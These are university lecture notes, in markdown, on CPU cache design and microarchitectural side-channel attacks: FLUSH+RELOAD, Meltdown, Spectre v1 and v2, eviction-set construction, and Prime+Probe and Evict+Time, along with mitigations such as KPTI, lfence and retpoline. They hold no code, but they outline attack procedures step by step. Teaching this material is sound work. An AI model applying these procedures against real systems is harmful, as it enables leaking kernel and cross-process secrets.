cpus.md - lectures.alex.balgavy.eu - Lecture notes from university.

cpus.md (9324B)
      1 +++
      2 title = 'CPUs'
      3 +++
      4 # CPUs
      5 ## CPU caches
      6 Caches: add fast-path access to memory
      7 - shared across programs like memory
      8 - great for performance, bad for security
      9 
     10 Basic RELOAD attack: you can determine which function is being executed using a timing side channel -- a function that was already executed will be in the cache, so faster.
     11 
     12 Important properties:
     13 - size: three levels, with L1 smallest and L3 largest (shared across all cores)
     14 - inclusivity: a line in level X also in X+1
     15 
     16 Addressing:
     17 - caches divided in sets, each address can only go to its own set
     18 - cache line lookup on memory access:
     19   - if present, hit. if not, miss → fill it in.
     20   - if set full, replace
     21     - replacement policy: most often least recently used
     22     - reverse engineering the policy:
     23           - implement simulator for textbook replacement policies
     24           - run accesses through simulator & real caches
     25           - compare hit and misses to find best policy match
     26 - indexing: policy to select target cache set given memory address
     27 - tagging: how to select cache line within cache set given memory address
     28   - practical implementations use physical address to identify cache line in set (tag)
     29   - virtual address have problems: e.g. multiple virtual addresses map to single physical address, or vice versa
     30 - L1: VIPT (virt index, phys tag), 64 sets, 8 ways. bits 6-11 decide the set, shared between virt and phys page.
     31 - L2: PIPT, 1024 sets, 4 ways. bits 6-14 decide set
     32 - L3: sliced PIPT, 2048 sets per core, 16 ways, bits 6-16 decide set
     33   - L3 is partitioned in slices, one per core, accessed via ring bus
     34 
     35 ## Timing cache attack
     36 Threat model
     37 - control of victim: measurement is synchronous, but assumes we can control and time when victim executes
     38 - no control: fewer assumptions on attacker, but measurement is async
     39 
     40 Flushing the cache: `clflush` (x86)
     41 - flushes given memory location in entire cache hierarchy
     42 - if attacker doesn't have access to target memory location, need more sophisticated cache eviction strategy
     43 
     44 Observing cache activity: FLUSH+RELOAD
     45 - threat model: victim and attacker share target code/data
     46 - attacker can selectively flush a desired shared location from cache, then reload the target location
     47 - measuring access times, can determine whether the victim accesses a memory address
     48 
     49 ## Cache attacks on hardware - out-of-order execution
     50 for FLUSH+RELOAD, victim hardware unit must:
     51 - use cache
     52 - share memory with attacker-controlled software
     53 - must access secrets
     54 
     55 covert channel: both parties controlled by attacker
     56 
     57 Rogue Data Cache Load (Meltdown): flush+reload attack
     58 - user process accesses kernel memory location
     59 - MMU raises exception and page fault handler kills off process
     60 - but out-of-order execution (OoOE) read secret and filled cache line
     61 - the reload 'sees' the filled cache line in the timing difference
     62 - avoiding termination: transactional memory (TSX) suppresses exceptions, use that
     63 - reducing noise: prefetcher in OoOE may fill extra cache lines, but usually doesn't operate across pages. also randomize accesses during reload state.
     64 
     65 Mitigating Meltdown:
     66 - KPTI: kernel page table isolation. don't map the kernel into user space, only some small part to switch to kernel space.
     67   - but very expensive -- better to fix in silicon
     68 
     69 ## Transient execution attacks
     70 Branch prediction unit: avoids pipeline stalls using speculative execution
     71 - pipeline stalls normally slow down execution
     72 - speculative execution runs some instructions in a branch, which may be rolled back
     73 - branch target buffer stores source addresses and history of the branch
     74 - speculative execution can have many levels of nesting
     75 
     76 After branch prediction:
     77 - correct → retire after branch instruction
     78 - misprediction → discard speculatively executed instructions
     79   - but does not revert microarchitectural state
     80 
     81 Spectre v1: bounds check bypass
     82 - train branch predictor at given program location to go to a specific branch
     83 - flush data that controls the branch
     84 - give the target branch an input that makes it go the other way
     85 - you need a gadget that accesses data out of bounds and transfers it to a variable
     86 - can generalize Meltdown -- leak from any array offset
     87 - can suppress exception with branch misprediction
     88 
     89 Mitigations for Spectre v1:
     90 - `lfence` stops speculation
     91   - but: serializes all loads in pipeline, so costly up to 2x overhead (though there are optimizations)
     92   - other instructions stop speculation, e.g. instructions to toggle SMAP
     93 - pointer/index masking on array access, so index can't go out of bounds
     94   - requires manual annotations in Linux kernel
     95 - low-resolution timers (but attackers can find other timer, or amplify signal by repeating)
     96 - process-based site isolation (different websites are in their own process)
     97   - assumes process isolation can't be breached
     98 
     99 Spectre v2: branch target injection
    100 - branch target buffer stores call target predictions (in another partition)
    101 - train branch prediction for a certain path
    102 - call in some context, the trained branch will be speculatively executed
    103 - attacker can train predictor in their address space
    104 - victim then mispredicts in their address space, calls into attacker-controlled address → ROP in speculative execution
    105 - when e.g. address spaces don't overlap, can't easily train for specific virtual address. can still abuse collisions in branch target buffer
    106   - BTB uses a few bits in the virtual address to select an entry
    107 
    108 Mitigations for Spectre v2:
    109 - Intel initially released microcode update with instructions to partially flush BTB
    110   - OS vendors did not adopt it
    111 - Retpoline: compiler-based, turns indirect calls into returns, predicted with Return Stack Buffer
    112   - goal: redirect speculation to safe landing pad
    113   - `ret` predictor assumes we are returning to first instruction after last call, which contains an infinite loop with an `lfence`
    114   - problems:
    115     - indirect calls don't actually speculate, which is slow
    116     - on recent microarchitectures, if RSB is empty, predictor uses BTB, enabling attacks
    117       - options: "stuff" RSB with special entries, or use eIBRS (BTB partitioned across privilege levels & hyperthreads)
    118 
    119 Other applications of transient/speculative execution
    120 - ExSpectre: craft shadow `memcpy` -- one that transfers memory between addresses, but its data flows are hidden in speculative execution
    121 - BlindSide: BROP attack against kernel, buffer overflow without exceptions (suppressed by speculative execution)
    122 
    123 ## Advanced cache attacks
    124 Limitations of flush+reload:
    125 - need `clflush` instruction access (not in JavaScript or ARM)
    126 - need shared memory, not in e.g. in-kernel Spectre
    127 - relies on timing, not in e.g. sandbox forbidding access to timers
    128 - causes cache misses on victim execution
    129 
    130 Eviction-based attacks:
    131 - goal: no `clflush` and shared memory
    132 - monitor cache sets instead of cache lines, use 1 eviction set to monitor 1 victim cache set
    133   - eviction set: given a target cache set, it's a set of memory addresses that, if accessed, will evict any other entry in the set
    134 
    135 Building eviction set for L1:
    136 - 1 eviction set for each cache set in L1
    137 - build eviction sets for all cache sets → can monitor L1 for victim accesses
    138 - L1: 64 sets (within 4KB page, we have 64 cache lines, each belonging to different color (cache set)).
    139 - 8 ways (we need 8 4KB pages, need to access first cache line of these pages to fill entire red cache set).
    140 
    141 Building an eviction set for L2:
    142 1. Allocate large pool of pages (large enough to cover all cache sets and ways of target cache)
    143 2. Pick page P from pool
    144 3. Check that accessing first cache line of all other pages evicts first cache line of P
    145 4. Pick page Q from pool and remove it. See if pool without Q still evicts P. If yes, remove Q from pool.
    146 5. Keep removing pages until pool has exactly 4 members. This is eviction set for P (64 sets).
    147 6. Try this again with page that eviction set for P doesn't does not evict to find another eviction set.
    148 
    149 In L1 and L2, cache sets will be striped throughout memory.
    150 But because L3 is sliced, the distribution will be chaotic.
    151 However, the same eviction set algorithm also works for L3, because no assumptions are made on physical addresses.
    152 
    153 Prime+probe attack:
    154 - attacker does not control victim, code/data not shared
    155 - steps:
    156   1. Prime: Build L3 eviction sets for victim locations. Walk all eviction sets corresponding to cache sets the attacker wants to monitor. This puts the cache in a known state.
    157   2. Victim accesses cache set
    158   3. Probe: walk eviction set, check for speed. If slow, the attacker knows the cache set was accessed.
    159 
    160 Evict+time:
    161 - attacker controls victim, code/data not shared
    162 - less noisy -- we can control execution of victim
    163 - steps:
    164   1. Build L3 eviction sets for victim locations. Walk all eviction sets corresponding to cache sets the attacker wants to monitor.
    165   2. Craft input to interface (e.g. RPC) to talk to victim and create execution of victim that performs secret-dependent computation
    166   3. Time execution of victim under its control, and if slow, the victim accessed the cache set
    167 - as an attack against the MMU, trigger page table walk of MMU and time the accesses
    168   - MMU accesses CPU caches because address translation is frequent and costly
    169   - AnC needs to trigger victim page table walks, at least flush TLB (evict entries in TLB with eviction sets)
	lectures.alex.balgavy.eu Lecture notes from university.
	git clone git://git.alex.balgavy.eu/lectures.alex.balgavy.eu.git
	Log \| Files \| Refs \| Submodules